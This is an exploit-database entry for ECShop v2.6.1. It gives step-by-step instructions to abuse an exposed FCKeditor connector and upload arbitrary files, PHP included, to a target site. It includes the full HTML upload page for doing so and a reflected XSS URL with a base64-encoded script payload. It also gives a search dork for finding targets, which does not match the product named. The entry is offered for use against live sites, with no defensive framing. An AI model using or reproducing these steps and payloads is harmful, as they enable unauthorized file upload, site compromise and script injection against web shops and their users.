ECShop v2.6.1 (FCKeditor Remote Upload File / XSS) Exploit

2010-08-22T00:00:00
ID 1337DAY-ID-10049
Type zdt
Reporter indoushka
Modified 2010-08-22T00:00:00

Description

Exploit for asp platform in category web applications

                                        
                                            ==========================================================
ECShop v2.6.1 (FCKeditor Remote Upload File / XSS) Exploit
==========================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    #######################################           1
0                    I'm indoushka member from Inj3ct0r Team           1
1                    #######################################           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 

# Vendor: http://www.ecshop.com/

# Date: 2010-05-27 

# Author : indoushka 

# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! 

# Home : www.sec4ever.com

# Bug  : Remote Upload File Exploit / XSS

# Tested on : windows SP2 Franзais V.(Pnx2 2.0)                                                                                                               

# Dork : Powered By Alegro Cart    
                                                                 
# Exploit By indoushka 

1 - 

[~] 1.Save code html format

[~] 2.Search Target.com

[~] 3.Edit and replace & Target

[~] 4.Save Html Page

[~] 5.Open Page Html (Edite Source)

[~] 6.Set Format PHP

[~] 7.Choose File & Upload

[~] 8.Formats can be uploaded (Html.Htm.Jpg.gif.Xml....)

[~] 9.Target.com/images/uploads/File/File Name


2 - code html format

<head>
	<title>FCKeditor - Connectors Tests</title>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<script type="text/javascript">

// Automatically detect the correct document.domain (#1919).
(function()
{
	var d = document.domain ;

	while ( true )
	{
		// Test if we can access a parent property.
		try
		{
			var test = window.opener.document.domain ;
			break ;
		}
		catch( e ) {}

		// Remove a domain part: www.mytest.example.com => mytest.example.com => example.com ...
		d = d.replace( /.*?(?:\.|$)/, '' ) ;

		if ( d.length == 0 )
			break ;		// It was not able to detect the domain.

		try
		{
			document.domain = d ;
		}
		catch (e)
		{
			break ;
		}
	}
})() ;

function BuildBaseUrl( command )
{
	var sUrl =
		document.getElementById('cmbConnector').value +
		'?Command=' + command +
		'&Type=' + document.getElementById('cmbType').value +
		'&CurrentFolder=' + encodeURIComponent(document.getElementById('txtFolder').value) ;

	return sUrl ;
}

function SetFrameUrl( url )
{
	document.getElementById('eRunningFrame').src = url ;

	document.getElementById('eUrl').innerHTML = url ;
}

function GetFolders()
{
	SetFrameUrl( BuildBaseUrl( 'GetFolders' ) ) ;
	return false ;
}

function GetFoldersAndFiles()
{
	SetFrameUrl( BuildBaseUrl( 'GetFoldersAndFiles' ) ) ;
	return false ;
}

function CreateFolder()
{
	var sFolder = prompt( 'Type the folder name:', 'Test Folder' ) ;

	if ( ! sFolder )
		return false ;

	var sUrl = BuildBaseUrl( 'CreateFolder' ) ;
	sUrl += '&NewFolderName=' + encodeURIComponent( sFolder ) ;

	SetFrameUrl( sUrl ) ;
	return false ;
}

function OnUploadCompleted( errorNumber, fileName )
{
	switch ( errorNumber )
	{
		case 0 :
			alert( 'File uploaded with no errors' ) ;
			break ;
		case 201 :
			GetFoldersAndFiles() ;
			alert( 'A file with the same name is already available. The uploaded file has been renamed to "' + fileName + '"' ) ;
			break ;
		case 202 :
			alert( 'Invalid file' ) ;
			break ;
		default :
			alert( 'Error on file upload. Error number: ' + errorNumber ) ;
			break ;
	}
}

this.frames.frmUpload = this ;

function SetAction()
{
	var sUrl = BuildBaseUrl( 'FileUpload' ) ;
	document.getElementById('eUrl').innerHTML = sUrl ;
	document.getElementById('frmUpload').action = sUrl ;
}

	</script>
</head>
<body>
	<table height="100%" cellspacing="0" cellpadding="0" width="100%" border="0">
		<tr>
			<td>
				<table cellspacing="0" cellpadding="0" border="0">
					<tr>
						<td>
							Connector:<br />
							<select id="cmbConnector" name="cmbConnector">
								<option value="asp/connector.asp" selected="selected">ASP</option>
								<option value="aspx/connector.aspx">ASP.Net</option>
								<option value="cfm/connector.cfm">ColdFusion</option>
								<option value="lasso/connector.lasso">Lasso</option>
								<option value="perl/connector.cgi">Perl</option>
								<option value="php/connector.php">PHP</option>
								<option value="py/connector.py">Python</option>
							</select>
						</td>
						<td>
							&nbps;&nbps;&nbps;</td>
						<td>
							Current Folder<br />
							<input id="txtFolder" type="text" value="/" name="txtFolder" /></td>
						<td>
							&nbps;&nbps;&nbps;</td>
						<td>
							Resource Type<br />
							<select id="cmbType" name="cmbType">
								<option value="File" selected="selected">File</option>
								<option value="Image">Image</option>
								<option value="Flash">Flash</option>
								<option value="Media">Media</option>
								<option value="Invalid">Invalid Type (for testing)</option>
							</select>
						</td>
					</tr>
				</table>
				<br />
				<table cellspacing="0" cellpadding="0" border="0">
					<tr>
						<td valign="top">
							<a href="#" onclick="GetFolders();">Get Folders</a></td>
						<td>
							&nbps;&nbps;&nbps;</td>
						<td valign="top">
							<a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td>
						<td>
							&nbps;&nbps;&nbps;</td>
						<td valign="top">
							<a href="#" onclick="CreateFolder();">Create Folder</a></td>
						<td>
							&nbps;&nbps;&nbps;</td>
						<td valign="top">
							<form id="frmUpload" action="" target="eRunningFrame" method="post" enctype="multipart/form-data">
								File Upload<br />
								<input id="txtFileUpload" type="file" name="NewFile" />
								<input type="submit" value="Upload" onclick="SetAction();" />
							</form>
						</td>
					</tr>
				</table>
				<br />
				URL: <span id="eUrl"></span>
			</td>
		</tr>
		<tr>
			<td height="100%" valign="top">
				<iframe id="eRunningFrame" src="javascript:void(0)" name="eRunningFrame" width="100%"
					height="100%"></iframe>
			</td>
		</tr>
	</table>
</body>
</html>

2 - http://localhost:8080/search.php?encode=YToxMzp7czo4OiJjYXRlZ29yeSI7czoxOiIwIjtzOjg6ImtleXdvcmRzIjtzOjEyOiLmkanmiZjnvZfmi4kiO3M6NToiaW50cm8iO3M6Mzc6IjE%2bIj48U2NSaVB0IA0KPmFsZXJ0KDQyNTI1KTs8L1NjUmlQdD4iO3M6NToiYnJhbmQiO3M6MToiMCI7czo0OiJzb3J0IjtzOjg6Imdvb2RzX2lkIjtzOjU6Im9yZGVyIjtzOjQ6IkRFU0MiO3M6OToibWluX3ByaWNlIjtzOjE6IjAiO3M6OToibWF4X3ByaWNlIjtzOjE6IjAiO3M6NjoiYWN0aW9uIjtzOjE6IjEiO3M6MTA6Imdvb2RzX3R5cGUiO3M6MToiMCI7czo1OiJzY19kcyI7czoxOiIwIjtzOjQ6InBhZ2UiO3M6MToiMiI7czoxODoic2VhcmNoX2VuY29kZV90aW1lIjtpOjEyNzYwODcyODY7fQ==

Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
all my friend :
His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
(cr4wl3r Let the poor live ) * RoAd_KiLlEr * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te 
---------------------------------------------------------------------------------------------------------------------------------



#  0day.today [2018-01-04]  #